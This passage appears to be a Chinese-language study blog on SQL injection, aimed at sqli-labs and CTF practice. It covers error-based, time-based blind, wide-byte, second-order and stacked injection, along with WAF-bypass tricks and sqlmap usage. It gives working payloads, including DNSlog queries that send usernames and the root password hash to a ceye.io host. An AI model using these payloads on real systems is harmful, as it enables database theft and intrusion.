**可以看出，以~开头的内容不是<span class="hljs-type">xml</span>格式的语法，报错，但是会显示无法识别的内容是什么**，这样就达到了目的。当然concat第一个参数是/时**不会报错**</code></pre>
<pre><code class="hljs mysql">updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)

updatexml()函数与extractvalue()类似，是更新xml文档的函数。

语法updatexml(目标xml文档，xml路径，更新的内容)

select username from security.user where id&#x3D;1 and (updatexml(‘anything’,’&#x2F;xx&#x2F;xx’,’anything’))

通过查询@@version,返回版本。然后CONCAT将其字符串化。因为UPDATEXML第二个参数需要Xpath格式的字符串,所以不符合要求，然后回显报错。

错误大概会是：
ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’   &#x2F;&#x2F;则爆出信息</code></pre>
<p>注意：</p>
<ul>
<li>updatexml是三个参数，中间参数配合concat注入，concat一三参数标识回显结果的头和尾，<code>0x7e</code>是<code>~</code></li>
<li>extractvalue两个参数，第二个参数配合concat</li>
<li><strong>extractvalue()和updatexml()</strong>只能回显==32位长度==的数据</li>
<li><span style="background:#bbffff;">
select，insert，update没有回显的都可以使用</span></li>
</ul>
<p>爆出所有表名</p>
<pre><code class="hljs mysql">http:&#x2F;&#x2F;www.anantest.com:8080&#x2F;sqlilabs&#x2F;Less-3&#x2F;
?id&#x3D;1&#39;) and updatexml(1,concat(0x23,(select group_concat(schema_name) from information_schema.schemata )),1)-

&#x2F;&#x2F;爆表名:
or extractvalue(1, concat(0x7e, (select concat(table_name) from information_schema.tables where table_schema&#x3D;database() limit 0,1)))
爆字段名:
or extractvalue(1, concat(0x7e, (select concat(column_name) from information_schema.columns where table_name&#x3D;&#39;users&#39; limit 0,1)))
爆数据:
or extractvalue(1, concat(0x7e, (select concat_ws(&#39;:&#39;, username, password) from users limit 0,1))) or &#39;&#39;</code></pre>
<h4 id="floor"><a target="_blank" rel="noopener" href="https://www.cnblogs.com/c1047509362/p/12806297.html"><strong>floor</strong></a></h4>
<h3 id="时间盲注">时间盲注</h3>
<blockquote>
<p>用工具、脚本</p>
</blockquote>
<ol type="1">
<li>与布尔盲注类似，但是无法通过返回信息判断对错，因为只返回true。可通过时间函数sleep，<strong><span style="background:#BBFFBB;">通过web页面响应时间判断注入语句是否成功</span></strong></li>
<li>用<code>if</code>和<code>sleep</code>函数判断是ture还是false
<u>正确就延迟n秒返回，错误就0s返回</u></li>
</ol>
<pre><code class="hljs apache"><span class="hljs-attribute">if</span>类似三目运算
<span class="hljs-attribute">if</span>(条件,expr<span class="hljs-number">2</span>,expr<span class="hljs-number">3</span>)，如果条件为true,则返回expr<span class="hljs-number">2</span>的值，否则返回<span class="hljs-number">3</span></code></pre>
<p><img src="https://pb-1307852621.cos.ap-chengdu.myqcloud.com/typora/202401041439844.png" srcset="/img/loading.gif" alt="image-20210726204326926" style="zoom:67%;"></p>
<p><span style="background:#bbffff;">sleep可以放在if的第二个参数，也可以是if放在sleep里</span></p>
<pre><code class="hljs angelscript">select * <span class="hljs-keyword">from</span> member where id=<span class="hljs-number">1</span> <span class="hljs-keyword">and</span> sleep (<span class="hljs-keyword">if</span> (database ()=<span class="hljs-string">&#x27;a&#x27;</span>,<span class="hljs-number">1</span>,<span class="hljs-number">0</span>));
如果database是a则停<span class="hljs-number">1</span>s否则不停
id=<span class="hljs-number">2</span> <span class="hljs-keyword">and</span>  sleep( <span class="hljs-keyword">if</span>(  (SELECT count(SCHEMA_NAME) FROM information_schema.SCHEMATA) = <span class="hljs-number">7</span>,    <span class="hljs-number">0</span>,<span class="hljs-number">5</span> ))
好像这个是说如果数据库总数等于<span class="hljs-number">7</span>的话<span class="hljs-number">0</span>s返回否则<span class="hljs-number">5</span>s</code></pre>
<ol start="3" type="1">
<li>其他操作如获取库名、表名、爆破子段等等同布尔注入，只是通过sleep函数查看是否成功</li>
</ol>
<h3 id="宽子节注入">宽子节注入</h3>
<ul>
<li><a target="_blank" rel="noopener" href="https://blog.csdn.net/u011721501/article/details/42874517">**精简，CSDN
原理及防御</a></li>
<li><a target="_blank" rel="noopener" href="https://www.jianshu.com/p/7af00dcdd5d1">少，易理解，简书</a></li>
<li><a target="_blank" rel="noopener" href="https://zgao.top/mysql%E5%AE%BD%E5%AD%97%E8%8A%82%E6%B3%A8%E5%85%A5%E5%88%86%E6%9E%90/">***个人博客，内容点基础但面面俱到易理解</a></li>
<li><a target="_blank" rel="noopener" href="https://www.cnblogs.com/zhaoyixiang/p/10970117.html">跟前面差不多，都是很基础/常见的讲解，但配有例子，及sqlmap怎么宽子节注入</a></li>
</ul>
<blockquote>
<p>要点： -
主要是绕过编码漏洞使单引号逃逸，让他闭合掉前面的查询，不被转义 -
PHP编码为UTF-8而Mysql的编码设置为<code>set  names 'gbk'</code>或是<code>set character_set_client=gbk</code>，这样配置会引发编码转换从而导致的注入漏洞(<strong>一个gbk编码汉字，占用2个字节，一个utf-8编码的汉字，占用3个字节</strong>）
-
由于宽字节带来的安全问题主要是吃ASCII字符(一字节)的现象，将后面的一个字节与前一个大于128的ascii码进行组合成为一个完整的字符（mysql判断一个字符是不是汉字，首先两个字符时一个汉字，另外根据gbk编码，<strong>第一个字节ascii码大于128，基本上就可以了</strong>），此时’前的，我们就可以使用’了，
-
<strong>只要报错就说明单引号逃逸，起了作用，留了一个单的引号，语法错误</strong>
-
<strong>加了单引号不报错，说明单引号被转义或者被addslashes函数过滤掉了</strong></p>
</blockquote>
<ul>
<li>一般常见的宽字符注入 <pre><code class="hljs php">%df%<span class="hljs-number">27</span>===&gt;(addslashes)====&gt;%df%<span class="hljs-number">5</span>c%<span class="hljs-number">27</span>====&gt;(GBK)====&gt;運’
用户输入==&gt;过滤函数==&gt;代码层的$sql==&gt;mysql处理请求==&gt;mysql中的sql
http:<span class="hljs-comment">//www.xxx.com/login.php?user=%df’ or 1=1 limit 1,1%23&amp;pass=</span>
其对应的sql就是：
select * fromcms_user where username = ‘運’ <span class="hljs-keyword">or</span> <span class="hljs-number">1</span>=<span class="hljs-number">1</span> limit <span class="hljs-number">1</span>,<span class="hljs-number">1</span><span class="hljs-comment">#’ and password=”</span></code></pre></li>
</ul>
<h4 id="套路">套路</h4>
<ol type="1">
<li><p>试探是否有注入漏洞url里输入 <code>admin%df%27</code></p></li>
<li><p>爆列数<code>?id=1%df%27 order by 2#</code>  列数得知
2列。</p></li>
<li><p>爆库： <code>?id=-1%df%27 union select 1,database()%23</code>
数据库:sae-chinalover</p></li>
<li><p>爆列表: <pre><code class="hljs angelscript">?id=<span class="hljs-number">-1</span>%df%<span class="hljs-number">27</span> union select <span class="hljs-number">1</span>,group_concat(table_name) <span class="hljs-keyword">from</span> information_schema.tables where table_schema=<span class="hljs-number">0x7361652d6368696e616c6f766572</span>%<span class="hljs-number">23</span></code></pre> 爆出这些表:
ctf,ctf2,ctf3,ctf4,gbksqli,news</p></li>
<li><p>爆字段： <pre><code class="hljs pgsql">?id=<span class="hljs-number">-1</span>%df%<span class="hljs-number">27</span> <span class="hljs-keyword">union</span> <span class="hljs-keyword">select</span> <span class="hljs-number">1</span>,group_concat(<span class="hljs-built_in">column_name</span>) <span class="hljs-keyword">from</span> information_schema.<span class="hljs-keyword">columns</span> <span class="hljs-keyword">where</span> <span class="hljs-built_in">table_name</span>=<span class="hljs-number">0x63746634</span>%<span class="hljs-number">23</span></code></pre> 字段:id flag</p></li>
<li><p>查询关键字：
<code>?id=-1%df%27 union select 1,flag from ctf4%23</code></p></li>
<li><p>利用<strong>sqlmap</strong> <pre><code class="hljs perl">sqlmap -u <span class="hljs-string">&quot;http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df%27&quot;</span></code></pre></p></li>
</ol>
<h3 id="无列名注入">无列名注入</h3>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_40500631/article/details/89631904">csdn</a></p>
<ol type="1">
<li>无列名注入主要是适用于<strong>已经获取到数据表名</strong>，但无法查询列的情况下，在大多数
CTF 题目中，information_schema 库被过滤，使用这种方法获取列名。</li>
<li>通过对要查询的列起别名，并查询这个别名将数据查出，达到未知列名，依旧查询到信息的效果</li>
<li>要点：==使用反引号`加数字表示<strong>列名或者表名</strong>，或者用别名表示【反引号被过滤时】【<strong>a.3</strong>】==</li>
<li>==<a target="_blank" rel="noopener" href="https://www.cnblogs.com/GH-D/p/11962522.html">也可以使用join报错进行无列名注入</a>==</li>
</ol>
<p><img src="https://pb-1307852621.cos.ap-chengdu.myqcloud.com/typora/202401041439845.png" srcset="/img/loading.gif" alt="image-20210522141728684"></p>
<p><img src="https://pb-1307852621.cos.ap-chengdu.myqcloud.com/typora/202401041439846.png" srcset="/img/loading.gif" alt="image-20210522134617792" style="zoom:50%;"></p>
<pre><code class="hljs mysql">&#x2F;&#x2F;表有5列,列名为id,name,pass,mail,phone
select 1,2,3,4,5 union select*from users;   &#x2F;&#x2F;列名变成12345，未知实际列名，前提是要知道表名 
&#x2F;&#x2F;继续使用数字来对应列,如3对应了表里面的pass:
select&#96;3&#96;from (select 1,2,3,4,5 union select*from users)a;
&#x2F;&#x2F;当&#96;不能使用的时候，使用别名来代替：
select b from (select 1,2,3 as b,4,5 union select*from users)a;
&#x2F;&#x2F;在注入中查询多个列：
select concat(&#96;2&#96;,0x3a,&#96;3&#96;) from (select 1,2,3,4,5 union select *from users)a limit 1,1;  &#x2F;&#x2F;0x3a表示：</code></pre>
<p><img src="https://pb-1307852621.cos.ap-chengdu.myqcloud.com/typora/202401041439848.png" srcset="/img/loading.gif" alt="image-20210522134817435"></p>
<h4 id="总结一般套路">总结，一般套路：</h4>
<p>别名法：</p>
<pre><code class="hljs mysql">(select &#96;2&#96; from (select 1,2,3 union select * from table_name)a)  &#x2F;&#x2F;前提是要知道表名</code></pre>
<pre><code class="hljs mysql">((select c from (select 1,2,3 c union select * from users)b))    1，2，3是因为users表有三列，实际情况还需要猜测表的列的数量</code></pre>
<pre><code class="hljs mysql">select a.3 from (select 1,2,3 union select * from users) as a;</code></pre>
<p>join法：</p>
<pre><code class="hljs mysql">select * from (select * from users as a join users b)c;  &#x2F;&#x2F;爆列名
ERROR 1060(42S21):Duplicate column name &#39;username&#39;  &#x2F;&#x2F;得到列名username</code></pre>
<pre><code class="hljs sql">-1&#x27; union <span class="hljs-keyword">select</span> <span class="hljs-number">1</span>, (<span class="hljs-keyword">select</span> <span class="hljs-keyword">group_concat</span>(a) <span class="hljs-keyword">from</span>(<span class="hljs-keyword">select</span> <span class="hljs-number">1</span> <span class="hljs-keyword">as</span> s,<span class="hljs-number">2</span> <span class="hljs-keyword">as</span> a,<span class="hljs-number">3</span> <span class="hljs-keyword">as</span> b <span class="hljs-keyword">union</span> <span class="hljs-keyword">select</span> * <span class="hljs-keyword">from</span> <span class="hljs-keyword">users</span>)<span class="hljs-keyword">as</span> m),<span class="hljs-number">3</span>,<span class="hljs-number">4</span>,<span class="hljs-number">5</span>,<span class="hljs-number">6</span><span class="hljs-string">&#x27;</span>
<span class="hljs-string">//一个查询语句的条件需要另一个查询语句来获取，内层查询语句的查询结果，可以为外层查询语句提供查询条件，把users中第一列别名s,第二列别名a，第三列别名b，查询得到新的表别名m，供给外部查询a列</span></code></pre>
<h2 id="注入拓展">🐱‍🏍注入拓展</h2>
<h4 id="加解密">加解密</h4>
<blockquote>
<p>sqlilabs 21关</p>
</blockquote>
<p>关键点：注入的语句加密后发送</p>
<ul>
<li>关联sqlmap：
<ul>
<li>配合参数tamper，自带插件，使用外部.py文件实现例如base64注入点</li>
<li>也可以不用插件自己写脚本配合sqlmap【<span style="background:#FF9999;">中转注入</span>】
<ul>
<li><img src="https://pb-1307852621.cos.ap-chengdu.myqcloud.com/typora/202401041439849.png" srcset="/img/loading.gif" alt="image-20210727204045560"></li>
<li>然后<code>sqlmap -u "http://127.0.0.1:8080/test.php?x=" -v 3</code>，
<code>-v 3</code>是sqlmap显示注入语句</li>
</ul></li>
</ul></li>
</ul>
<h4 id="json注入">JSON注入</h4>
<h4 id="ladp注入">LADP注入</h4>
<h4 id="dnslog注入">DNSlog注入</h4>
<blockquote>
<p>sqlilabs 9 load_file+dnslog带外注入</p>
</blockquote>
<blockquote>
<p>http://ceye.io/profile【免费的记录dnslog的平台】</p>
<p>https://github.com/ADOOO/DnslogSqlinj【win下】</p>
<p>http://www.dnslog.cn</p>
<p>http://admin.dnslog.link/</p>
</blockquote>
<blockquote>
<p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/-qing-/p/10623583.html">个人博客详解1</a>、<a target="_blank" rel="noopener" href="https://www.cnblogs.com/xhds/p/12322839.html">*3</a>、<a target="_blank" rel="noopener" href="https://www.freebuf.com/sectool/280777.html">**freebuf</a></p>
</blockquote>
<ol type="1">
<li>用户得是root，有读写文件的权限</li>
<li>解决了盲注还不能<em>回显数据</em>，效率低的问题,<strong>另外要发送大量的get请求，那么这种行为很容易被目标物理防火墙认定位是黑客行为，最终导致IP被ban。而DNS不会</strong></li>
</ol>
<ul>
<li><p>原理</p>
<ul>
<li>DNS在解析的时候会留下日志，咱们这个就是读取多级域名的解析日志，来获取信息
<strong>简单来说就是把信息放在高级域名中，传递到自己这，然后读取日志，获取信息</strong></li>
<li>原理上只要能进行DNS请求的函数都可能存在DNSlog注入。</li>
</ul></li>
<li><p>应用条件</p>
<ul>
<li><span style="background:#FF9999;">windows下</span>Mysql【因为Linux没有UNC路径，所以当处于Linux系统时，不能使用该方式获取数据】</li>
<li>返回数据没有特殊符号</li>
<li><strong>load_file函数，【<span style="background:#FF9999;">所以一般得是root权限</span>】，</strong>load_file()不仅能够加载本地文件，同时也能对诸如www.test.com这样的URL发起请求。</li>
</ul></li>
<li><p>应用场景</p>
<ul>
<li>SQL注入中的盲注
在sql注入时为布尔盲注、时间盲注，注入的效率低且线程高容易<strong>被waf拦截</strong>，又或者是目标站点<strong>没有回显</strong></li>
<li>无回显的命令执行
我们在读取文件、执行命令注入等操作时无法明显的确认是否利用成功</li>
<li>无回显的SSRF</li>
<li><strong><span style="background:#FF9999;">总之就是靶机不让信息显示出来，如果靶机能发送请求，那么就可以尝试咱这个办法——用DNSlog来获取回显</span></strong></li>
</ul></li>
<li><p><a target="_blank" rel="noopener" href="https://www.xcnte.com/archives/512/">load_file</a>--<strong>读取一个文件并将其内容作为字符串返回。</strong></p>
<ul>
<li><p><strong>必须指定文件==完整的路径==</strong></p></li>
<li><p>``` SELECT LOAD_FILE('/data/test.txt') AS Result;
//返回test文件内容 <pre><code class="hljs autohotkey">  
  - 参数可以是`char()`或者十六进制`hex()`的形式
  
  

普通回显win：
</code></pre> ping %USERNAME%.j1wbye.ceye.io
<pre><code class="hljs pgsql">
&lt;img src=&quot;https://pb-1307852621.cos.ap-chengdu.myqcloud.com/typora/202401041439850.png&quot; alt=&quot;image-20210728162212024&quot; style=&quot;zoom: 67%;&quot; /&gt;&lt;img src=&quot;https://pb-1307852621.cos.ap-chengdu.myqcloud.com/typora/202401041439851.png&quot; alt=&quot;image-20210728162224771&quot; style=&quot;zoom:67%;&quot; /&gt;

<span class="hljs-keyword">SQL</span>注入：


```mysql
load_file(concat(<span class="hljs-string">&#x27;\\\\&#x27;</span>,(<span class="hljs-keyword">select</span> <span class="hljs-keyword">database</span>()),<span class="hljs-string">&#x27;.abcdef.ceye.io\\sql&#x27;</span>)) //重点
所以就等同于访问了<span class="hljs-keyword">database</span>().abcdef.ceye.io，然后我们的ceye平台就会有记录，那么<span class="hljs-keyword">database</span>()就得到了，\\<span class="hljs-keyword">sql</span>是域名目录，随意即可，<span class="hljs-keyword">select</span> <span class="hljs-keyword">database</span>()换成<span class="hljs-keyword">sql</span>注入payload即可

  要注意的是数据很可能不止一行，因此要用<span class="hljs-keyword">limit</span>分次输出。
  
<span class="hljs-keyword">SELECT</span> LOAD_FILE(CONCAT(<span class="hljs-string">&#x27;\\\\&#x27;</span>,(<span class="hljs-keyword">SELECT</span> <span class="hljs-keyword">password</span> <span class="hljs-keyword">FROM</span> mysql.<span class="hljs-keyword">user</span> <span class="hljs-keyword">WHERE</span> <span class="hljs-keyword">user</span>=<span class="hljs-string">&#x27;root&#x27;</span> <span class="hljs-keyword">LIMIT</span> <span class="hljs-number">1</span>),<span class="hljs-string">&#x27;.mysql.ip.port.b182oj.ceye.io\\abc&#x27;</span>)); 【<span class="hljs-keyword">limit</span>后加<span class="hljs-number">1</span>个数字：前几行】
  
<span class="hljs-number">1.</span> 查询数据库名
http://<span class="hljs-number">127.0</span><span class="hljs-number">.0</span><span class="hljs-number">.1</span>/lou/<span class="hljs-keyword">sql</span>/Less<span class="hljs-number">-9</span>/?id=<span class="hljs-number">1</span><span class="hljs-string">&#x27; and load_file(concat(&#x27;</span>\\\\<span class="hljs-string">&#x27;,(select database()),&#x27;</span>.cmr1ua.ceye.io\\abc<span class="hljs-string">&#x27;))--+</span>
<span class="hljs-string"></span>
<span class="hljs-string">2. 获取数据表</span>
<span class="hljs-string">http://127.0.0.1/lou/sql/Less-9/?id=1&#x27;</span> <span class="hljs-keyword">and</span> load_file(concat(<span class="hljs-string">&#x27;\\\\&#x27;</span>,(<span class="hljs-keyword">select</span> <span class="hljs-built_in">table_name</span> <span class="hljs-keyword">from</span> information_schema.<span class="hljs-keyword">tables</span> <span class="hljs-keyword">where</span> table_schema=<span class="hljs-keyword">database</span>() <span class="hljs-keyword">limit</span> <span class="hljs-number">0</span>,<span class="hljs-number">1</span>),<span class="hljs-string">&#x27;.cmr1ua.ceye.io\\abc&#x27;</span>))<span class="hljs-comment">--+</span>

<span class="hljs-number">3.</span> 获取表中的字段名
<span class="hljs-string">&#x27; and load_file(concat(&#x27;</span>\\\\<span class="hljs-string">&#x27;,(select column_name from information_schema.columns where table_name=&#x27;</span>users<span class="hljs-string">&#x27; limit 0,1),&#x27;</span>.cmr1ua.ceye.io\\abc<span class="hljs-string">&#x27;))--+</span>
<span class="hljs-string"></span>
<span class="hljs-string">4. 获取表中字段下的数据</span>
<span class="hljs-string">&#x27;</span> <span class="hljs-keyword">and</span> load_file(concat(<span class="hljs-string">&#x27;\\\\&#x27;</span>,(<span class="hljs-keyword">select</span> <span class="hljs-keyword">password</span> <span class="hljs-keyword">from</span> users <span class="hljs-keyword">limit</span> <span class="hljs-number">0</span>,<span class="hljs-number">1</span>),<span class="hljs-string">&#x27;.cmr1ua.ceye.io\\abc&#x27;</span>))<span class="hljs-comment">--+</span>
<span class="hljs-string">&#x27; and load_file(concat(&#x27;</span>\\\\<span class="hljs-string">&#x27;,(select username from users limit 0,1),&#x27;</span>.cmr1ua.ceye.io\\abc<span class="hljs-string">&#x27;))--+</span>
<span class="hljs-string"></span>
<span class="hljs-string">//注意！⚠</span>
<span class="hljs-string">//因为在load_file里面不能使用@ ~等符号所以要区分数据我们可以先用group_ws()函数分割在用hex()函数转成十六进制即可 </span>
<span class="hljs-string">出来了再转回去</span>
<span class="hljs-string">&#x27;</span> <span class="hljs-keyword">and</span> load_file(concat(<span class="hljs-string">&#x27;\\\\&#x27;</span>,(<span class="hljs-keyword">select</span> hex(concat_ws(<span class="hljs-string">&#x27;~&#x27;</span>,username,<span class="hljs-keyword">password</span>)) <span class="hljs-keyword">from</span> users <span class="hljs-keyword">limit</span> <span class="hljs-number">0</span>,<span class="hljs-number">1</span>),<span class="hljs-string">&#x27;.cmr1ua.ceye.io\\abc&#x27;</span>))<span class="hljs-comment">--+</span></code></pre></p></li>
</ul></li>
</ul>
<p><a target="_blank" rel="noopener" href="https://www.freebuf.com/column/226091.html">Sqlmap支持dns回显注入</a></p>
<p>​ 在sqlmap中实现DNS注入加上参数</p>
<p>​ 在服务器安装好了sqlmap然后运行dns.py</p>
<pre><code class="hljs jboss-cli">	<span class="hljs-params">--dns-domain=</span>域名
python sqlmap.py -u <span class="hljs-string">&quot;http://127.0.0.1/sqli-labs-master/Less-2/?id=1&quot;</span> <span class="hljs-params">--tech</span> B <span class="hljs-params">--dns-domain</span> 192.168.0.18 <span class="hljs-params">--dbs</span></code></pre>
<p>​ 即可实现自动化</p>
<h4 id="二次注入">二次注入</h4>
<p><span style="background:#FF9999;">前端找不到，<strong>扫描工具也无效！</strong>
<strong>只能靠人工</strong></span></p>
<blockquote>
<p>sqlilab 登录框+24关</p>
</blockquote>
<blockquote>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_44262289/article/details/107699595?utm_medium=distribute.pc_relevant.none-task-blog-2~default~baidujs_baidulandingword~default-0.control&amp;spm=1001.2101.3001.4242">**CSDN简洁版</a></p>
<p><a target="_blank" rel="noopener" href="https://www.freebuf.com/articles/web/167089.html">freebuf科普加例题+强网杯</a></p>
<p>CTF-[网鼎杯2018]Unfinish【buu/cuthub】</p>
</blockquote>
<p>注册用户：插入数据，修改密码：更新数据</p>
<p>先注册用户，对用户名做马脚然后修改密码时实现对其他账号的注入</p>
<ul>
<li><p>关键点：插入危险数据=》显示危险数据</p></li>
<li><p><strong>核心原理：</strong></p></li>
</ul>
<p><strong>提前把危险语句插入数据库（插入），数据在存入数据库后还原成了用户输入的形式，当在数据库取出的时候（更新/查询），没有再次进行过滤和转义，执行语句导致错误，从而造成了二次注入。</strong></p>
<p>Q:二次注入可能存在在什么地方</p>
<ul>
<li><p>存在转义函数的地方</p></li>
<li><p>在<span style="background:#bbffff;">回溯数据输入的地方，如修改用户账户密码、修改文章标题</span></p></li>
<li><p>跨语言的应用，容易导致问题。比如前台PHP，后台java</p></li>
<li><p>日志相关：存日志时，读取了一些数据库里的信息，比如用户名等，然后又存储了一次</p></li>
<li><p>跨程序的数据传递：程序A处理完后存储到数据库，程序B去读取，未进行过滤</p></li>
<li><p><strong>二次注入漏洞挖掘思路有哪些</strong></p></li>
</ul>
<p>（1）数据库存储未转义，大多来说，存储到数据库中的东西只是做了表面的转义，实质上库里存储的还是原始状态的内容，在多数读取未校验的情况下，可输入特殊字符并在页面上完整显示的部分，有可能存在二次注入的可能。</p>
<p>（2）强交互部分，SQL注入是需要与数据库联动的，但往往在登录、修改内容、发布内容等功能上忽略了历史数据这一点，所以在遇到有修改账户密码、发布留言、发布内容的部分，大家不妨去试试注册一个test或者admin’--或者admin账号，然后在测试回复的内容或者修改的内容是否达到预期。如果与预期不符，那么有可能就存在二次注入，此时在精心构造sql语句即可。</p>
<p>（3）防御绕过，有些地方明显存在异常，但是又做了一些限制，比如年龄，限制了字段为is_numeric，那么我们可以通过转换进制，16进制等方式将其录入，查询时的效果是一样的，遇到其他的限制，跟xss绕过原理一样，大家可以脑洞大开，搞一些数据库可以解析的编码进去。</p>
<p>（4）多录入异常内容，多观察返回结果，凡是与自己录入的内容不一致的地方，就可以去看看是否存在二次注入。</p>
<p><strong>黑盒测试</strong>：观察能获得哪些信息，可以添加哪些信息，哪些信息可以修改，还可盲猜列名实现不同地方update时回显注入语句</p>
<ul>
<li><span style="background:#FF9999;">注意！</span>
<ul>
<li>is_numeric可以用16进制编码<code>hex()</code>绕过。</li>
</ul></li>
</ul>
<pre><code class="hljs sql">当访问username=test’&amp;password=123时，执行的SQL语句为： 
<span class="hljs-keyword">insert</span> <span class="hljs-keyword">into</span> <span class="hljs-keyword">users</span>(username,<span class="hljs-keyword">password</span>) <span class="hljs-keyword">values</span> ( ‘ <span class="hljs-keyword">test</span>\ ’ <span class="hljs-string">&#x27;,‘202cb962ac59075b964b07152d234b70’)数据库中就变成了</span>
<span class="hljs-string">test&#x27;</span>  <span class="hljs-number">123</span>
查询对应<span class="hljs-keyword">id</span>时
<span class="hljs-keyword">Select</span> * <span class="hljs-keyword">from</span> person <span class="hljs-keyword">where</span> ‘username’=‘<span class="hljs-keyword">test</span>’’ //发生注入，由于多了一个单引号，所以页面会报错。</code></pre>
<h4 id="堆叠注入">堆叠注入</h4>
<blockquote>
<p>sqlilab天书 38关</p>
</blockquote>
<p>​ 含义：多个sql语句以；放在一起</p>
<p>​ 数据库分号；代表语句结束=》按顺序进行</p>
<p>我们是用mysql_query()接收的sql语句。而mysql_query()它本身只能执行一句sql语句，所以就会出错。把mysql_query()换为mysqli_multi_query()就可以执行多条sql语句查询。但mysqli_multi_query()的返回类型为布尔型。</p>
<p>​ 并不是所有数据库都支持堆叠查询：<span style="background:#bbffff;">支持堆叠数据库类型：MYSQL MSSQL
Postgresql等</span></p>
<ul>
<li><p>用处</p>
<p>//注入需要管理员帐号密码，密码是加密，无法解密
//堆叠注入进行插入数据，用户密码自定义的，可以正常解密登录【自己添加一个管理员账号密码】</p></li>
<li><p>注意⚠</p>
<ul>
<li><strong>堆叠注入需要条件</strong>，在源代码关于sql是可以多条语句执行情况下可以堆叠注入，否则不行，不会执行SQL语句，会报错</li>
<li></li>
</ul></li>
</ul>
<h3 id="waf绕过">🛡WAF绕过</h3>
<blockquote>
<p>Sqlilabs-Less38-堆叠注入(多语句)</p>
</blockquote>
<blockquote>
<p>***<a target="_blank" rel="noopener" href="https://www.secpulse.com/archives/94962.html">WAF
Bypass数据库特性</a></p>
</blockquote>
<p><img src="https://pb-1307852621.cos.ap-chengdu.myqcloud.com/typora/202401041439852.png" srcset="/img/loading.gif" alt="image-20210808104332262" style="zoom:67%;"></p>
<blockquote>
<p>waf软件：阿里云盾，宝塔，安全狗</p>
</blockquote>
<ul>
<li>%0a 是换行符，%23 是#</li>
</ul>
<h4 id="参数污染">参数污染</h4>
<p>​ 有多个参数，以哪个参数为准</p>
<p>​ 服务器处理参数：</p>
<p><img src="https://pb-1307852621.cos.ap-chengdu.myqcloud.com/typora/202401041439853.png" srcset="/img/loading.gif" alt="image-20210808165140675"></p>
<pre><code class="hljs angelscript">例如apache：
?y=<span class="hljs-number">1</span>&amp;y=<span class="hljs-number">2</span>
GET最后y是<span class="hljs-number">2</span></code></pre>
<p>参数污染+特殊符号注释</p>
<pre><code class="hljs angelscript">id=<span class="hljs-number">-1</span><span class="hljs-comment">/**&amp;id=-1%20union%20select%201,2,3%23*/</span>
即id=<span class="hljs-number">-1</span> union select <span class="hljs-number">1</span>,<span class="hljs-number">2</span>,<span class="hljs-number">3</span>#*/</code></pre>
<p><img src="https://pb-1307852621.cos.ap-chengdu.myqcloud.com/typora/202401041439854.png" srcset="/img/loading.gif" alt="image-20210808170638727"></p>
<ul>
<li>sql注释</li>
</ul>
<pre><code class="hljs livecodeserver">SQL注释

　　单行注释　　<span class="hljs-comment">#后面直接加内容</span>

　　　　　　　　<span class="hljs-comment">--后面必须加空格</span>

　　多行注释　　<span class="hljs-comment">/**/</span>中间可跨行

　　<span class="hljs-comment">-- + 会删除</span></code></pre>
<ul>
<li>内联注释？</li>
</ul>
<p>MySQL数据库为了保持与其他数据库兼容，特意新添加的功能。
为了避免从MySQL中导出的SQL语句不能被其他数据库使用，它把一些
MySQL特有的语句放在 <code>/*! ... */</code>
中，这些语句在不兼容的数据库中使用时便
不会执行。而MySQL自身却能识别、执行。
==<code>/*!50001 */</code>表示数据库版本&gt;=5.00.01时中间的语句才会执行。==在SQL注入中，内联注释常用来绕过waf。</p>
<p>⚠️不一定是哪个版本就允许了，可以写python脚本跑出来</p>
<p><span style="background:#FF9999;">这是MYSQL特性：</span></p>
<pre><code class="hljs angelscript"><span class="hljs-comment">/*!select * from users*/</span>;   <span class="hljs-comment">//可以执行</span>
id=<span class="hljs-number">-1</span>%<span class="hljs-number">20</span>union%<span class="hljs-number">20</span><span class="hljs-comment">/*!44509select*/</span><span class="hljs-number">1</span>,<span class="hljs-number">2</span>,<span class="hljs-number">3</span> <span class="hljs-comment">//可以绕过waf</span>

还可以
union%<span class="hljs-number">20</span>all%<span class="hljs-number">23</span>%<span class="hljs-number">0</span>a%<span class="hljs-number">20</span>select%<span class="hljs-number">201</span>,<span class="hljs-number">2</span>,<span class="hljs-number">3</span>%<span class="hljs-number">23</span> <span class="hljs-comment">//加不加all效果一样</span></code></pre>
<p>推荐用FUZZ模糊测试=》脚本跑，一个个试效率低</p>
<pre><code class="hljs angelscript">SELECT * FROM users WHERE id=<span class="hljs-number">-1</span><span class="hljs-comment">/*%0a*/</span>union<span class="hljs-comment">/*%0a*/</span>select<span class="hljs-comment">/*%0a*/</span><span class="hljs-number">1</span>, <span class="hljs-number">2</span>,<span class="hljs-number">3</span>;

id =<span class="hljs-number">-1</span> union%<span class="hljs-number">23</span>a%<span class="hljs-number">0</span>Aselect <span class="hljs-number">1</span>,<span class="hljs-number">2</span>,<span class="hljs-number">3</span>;%<span class="hljs-number">23</span>  
也就是id =<span class="hljs-number">-1</span> union #a
select <span class="hljs-number">1</span>,<span class="hljs-number">2</span>,<span class="hljs-number">3</span>;#    <span class="hljs-comment">//注意#是单行注释，a为了隔开，再加个保证</span>


id =<span class="hljs-number">-1</span> union<span class="hljs-comment">/*%00*/</span>%<span class="hljs-number">23</span>a%<span class="hljs-number">0</span>A<span class="hljs-comment">/*!/*!select 1,2,3*/</span>;%<span class="hljs-number">23</span>
</code></pre>
<h4 id="salmap-tamper">salmap tamper</h4>
<p>利用sqlmap
tamper插件参数，对应文件夹下有各种自带脚本，我们也可以自己写然后用上
<pre><code class="hljs routeros">python sqlmap.py -u <span class="hljs-string">&quot;http://127.0.0.1/test.php?id=1&quot;</span> <span class="hljs-attribute">--tamper</span>=dog.py <span class="hljs-attribute">--proxy</span>=http://127.0.0.1:8080   proxy是开启代理，可用burp查看请求信息</code></pre> ##### 绕过工具检测
⚠️sqlmap请求时useragent会带上sqlmap的指纹，安全狗检测到会拦截，==工具直接被拦截==</p>
<p>=》对此我们修改useragent即可绕过拦截，sqlmap也有参数修改头
<code>python sqlmap.py -u "http://127.0.0.1/test.php?id=1" --tamper=dog.py --proxy=http://127.0.0.1:8080 --random-agent</code>使用自带字典随机头访问</p>
<p>⚠️sqlmap太慢了可能是php版本过高，5.2.。。试试</p>
<h5 id="绕过流量检测">绕过流量检测</h5>
